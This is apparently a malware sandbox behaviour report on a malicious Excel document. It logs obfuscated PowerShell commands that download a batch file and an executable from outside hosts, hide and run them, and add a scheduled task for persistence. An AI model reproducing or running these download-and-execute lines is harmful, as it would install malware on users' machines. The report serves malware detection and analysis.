Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
Source: unknown	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Source: unknown	Process created: C:\Windows\System32\mode.com mode 18,1
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sb.exe 'C:\Users\user\AppData\Roaming\sb.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\sb.exe {path}
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mode.com mode 18,1	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\sb.exe 'C:\Users\user\AppData\Roaming\sb.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sb.exe	Process created: C:\Users\user\AppData\Roaming\sb.exe {path}	Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2109986432.0000000002320000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2130280252.0000000002A30000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2107326515.0000000002A70000.00000002.00000001.sdmp

Data Obfuscation:

Obfuscated command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
Source: unknown	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;'	Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;			Jump to behavior

Source: C:\Users\user\AppData\Roaming\sb.exe

Code function: 27_2_004F2AA7 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

27_2_004F2AA7

Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_00682156 push ecx; ret	27_2_00682169
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_006B08FC push eax; ret	27_2_006B091A
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_006B099C push ecx; ret	27_2_006B09AC
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_0068118E push ecx; ret	27_2_006811A1
Source: C:\Users\user\AppData\Roaming\sb.exe	Code function: 27_2_0042BBAE push eax; ret	27_2_0042BBAF

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\sb.exe			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\sb.exe	File created: C:\Users\user\AppData\Roaming\axoikBEWgDCn.exe			Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
